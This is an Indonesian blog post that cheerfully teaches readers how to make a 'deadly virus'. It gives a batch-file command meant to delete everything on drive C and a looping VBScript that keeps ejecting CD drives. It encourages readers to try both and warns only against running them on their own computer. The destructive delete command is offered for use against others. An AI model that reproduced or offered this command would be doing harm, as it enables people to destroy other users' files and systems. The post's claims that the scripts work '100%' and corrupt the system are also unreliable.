Cara Membuat Virus Mematikan yang Sangat Bekerja 100 %

Ketika kamu sedang bermain atau belajar dengan menggunakan komputer kamu atau laptop kamu, pernah tidak kamu menemukan sesuatu yang m...


Ketika kamu sedang bermain atau belajar dengan menggunakan komputer kamu atau laptop kamu, pernah tidak kamu menemukan sesuatu yang menganggu kamu. Ya virus, terkadang virus itu sangat menganggu di komputer kita atau laptop kita, karna virus itu dapat juga merusak komputer kamu atau laptop kamu dan dapat menghapus segala file atau dokumen penting kita di komputer.

Kira-kira kamu tahu tidak siapa ya yang menciptakan virus itu? Pasti yang terlintas dipikiran kamu itu orang yang menciptakan virus itu orang yang sangat hebat dan pintar. Dan kamu berpikir apakah kita sebagai orang biasa dapat menciptakan virus yang mematikan nggak ya? Nah disini saya akan menjawab semuanya, kalau orang biasa seperti kita itu dapat menciptakan sebuah virus yang mematikan kok!

Mau tahu? penasaran? Dengan artikel yang saya buat ini, saya akan kasih tahu kamu, mengenai cara membuat virus mematikan  yang sangat bekerja 100%, keren bukan? Nah berikut saya kasih langkah-langkahnya ya. Disimak ya!

Cara Membuat Virus Mematikan
  • Untuk langkah yang pertama kali yang kamu lakukan adalah, kamu harus melewati tahapan-tahapan berikut: Buka file notepad pada komputer kamu, dan kamu masukan kode dibawah ini@Echo offDel C: *.* |y
  • Dan kalau sudah di copy paste, kamu bisa langsung save atau simpan dengan nama yang bebas terserah kamu asalkan belakangnya ditambahkan format .BAT . Misal: wendyvirus.bat
  •  Ketika semua sudah dijalankan, maka secara otomatis drive C yang ada dikomputer kamu dan sistem nya akan terhapus semua. Oh ya dan satu lagi, sistem komputer kamu juga akan mengalami korup. Saya sarankan agar tidak mencoba pada komputer kesayangan kamu sendiri ya!
Cara Membuat Virus Mematikan CD-ROM

-          Hal pertama yang harus kamu lakukan adalah, kamu harus buka notepad pada komputer atau laptop kamu.
-          Dan kamu bisa masukan kode berikut dibawah ini:
Set oWMP = CreateObject(“WMPlayer.OCX.7”)Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
-          Ketika sudah dimasukan atau kamu bisa langsung copy paste kok, setelah itu kamu simpan atau save dengan nama CD-ROM.vbs
-          Coba deh kamu double klik pada file yang tadi, maka coba perhatikan CD/DVD drive akan terus ter-eject.
-          Cara untuk menghentikannya, kamu bisa buka Task Manager dan langsung kamu matikan wscipt.exe.

Gimana? Sangat mudah bukan? Semoga artikel yang saya buat ini mengenai cara membuat virus mematikan dapat bermanfaat untuk pengetahuan kamu ya. Tenang ajah virus ini sangat bekerja 100 % kok. Oh ya peringatan keras nih, saya sarankan jangan pernah mencoba dengan komputer kesayangan kamu sendiri ya, nantinya file-file dokumen kamu akan terhapus semua. Kalau kamu ada cara lain mengenai hal ini, kamu bisa langsung saja ya, bagikan pada kolom komentar dibawah ini. Terimakasih dan selamat mencoba.

Peringatan: Jangan pernah mencoba dengan komputer kesayangan kamu sendiri ya!

Nama

5 juta,1,Agama,1,aksesoris komputer,1,Anak,5,Android,1,Aplikasi,2,asuransi,47,asuransi mobil,1,asuransi travel,2,bali,1,Bayi,1,Belanja,1,Belanja online,23,beli kacamata online,1,best shabu shabu di Jakarta,1,Bisnis,182,Busana,1,di bawah 1,1,Digital Marketing,17,Dokumen,2,edukasi,20,elektronik,3,Fashion,24,Forniture,2,Furniture,14,Gadget,12,Gaya hidup,18,Harga digital printing,1,harga hape 4g,2,harga hp 4g,1,Hotel,5,Ibu,10,ibu dan anak,20,ifw 2016,1,indonesia fashion week,1,indonesia fashion week 2016,1,Interior,3,internet,14,Jasa,12,jual kacamata online,1,jual kacamata pria,1,Jual Lakban,1,kacamata online,2,kalung kesehatan,2,kalung untuk kesehatan,2,Kamera Untuk Mobil,1,Kebersihan,31,kecantikan,32,keluarga,4,Kendaraan,1,Kesehatan,144,klinik kecantikan di Jakarta,1,Kosmetik,6,Makanan,27,makanan anak 1 tahun,1,Masakan,5,menu makanan sehat untuk diet,1,Minuman,7,minuman bisnis,3,modem 4g,1,nestle,1,oatmeal,1,oatmeal untuk diet,1,Olahraga,1,otomotif,19,Parenting indonesia,1,Pembangunan,2,Pendidikan,43,Perawatan Rambut Pria,1,perce,1,Percetakan,11,Permainan,1,Pertumbuhan,2,pertumbuhan anak,1,pola asuh anak,2,printer,1,Produk,1,Properti,20,rental scaffolding,1,Resep,5,Resep makanan,2,Resep Masakan,8,Resep oatmeal,1,Restaurant,2,reycom,2,sektor pertanian,1,shabu gen,1,Smartphone,2,spa,1,tas wanita,1,teknologi,80,TIKET,1,Tips,39,Tips Beli Kacamata Online Untuk Anak,1,Travelling,2,Umum,16,Universitas,2,Wanita,2,Wisata,14,Wisata Garut,1,Wisata Kuliner,7,
ltr
item
Samalidan: Cara Membuat Virus Mematikan yang Sangat Bekerja 100 %
Cara Membuat Virus Mematikan yang Sangat Bekerja 100 %
https://1.bp.blogspot.com/-LEvtmBOGHNg/WIaX--sivtI/AAAAAAAAEsI/vWZzITFOEUgP4vP0kGr-EigZHznPXu3DgCLcB/s320/cara%2Bmembuat%2Bvirus%2Bmematikan.PNG
https://1.bp.blogspot.com/-LEvtmBOGHNg/WIaX--sivtI/AAAAAAAAEsI/vWZzITFOEUgP4vP0kGr-EigZHznPXu3DgCLcB/s72-c/cara%2Bmembuat%2Bvirus%2Bmematikan.PNG
Samalidan
http://www.samalidan.com/2017/01/cara-membuat-virus-mematikan-yang.html
http://www.samalidan.com/
http://www.samalidan.com/
http://www.samalidan.com/2017/01/cara-membuat-virus-mematikan-yang.html
true
6436065597845150103
UTF-8
Loaded All Posts Not found any posts VIEW ALL Readmore Reply Cancel reply Delete By Home PAGES POSTS View All RECOMMENDED FOR YOU LABEL ARCHIVE SEARCH ALL POSTS Not found any post match with your request Back Home Sunday Monday Tuesday Wednesday Thursday Friday Saturday Sun Mon Tue Wed Thu Fri Sat January February March April May June July August September October November December Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec just now 1 minute ago $$1$$ minutes ago 1 hour ago $$1$$ hours ago Yesterday $$1$$ days ago $$1$$ weeks ago more than 5 weeks ago Followers Follow THIS CONTENT IS PREMIUM Please share to unlock Copy All Code Select All Code All codes were copied to your clipboard Can not copy the codes / texts, please press [CTRL]+[C] (or CMD+C with Mac) to copy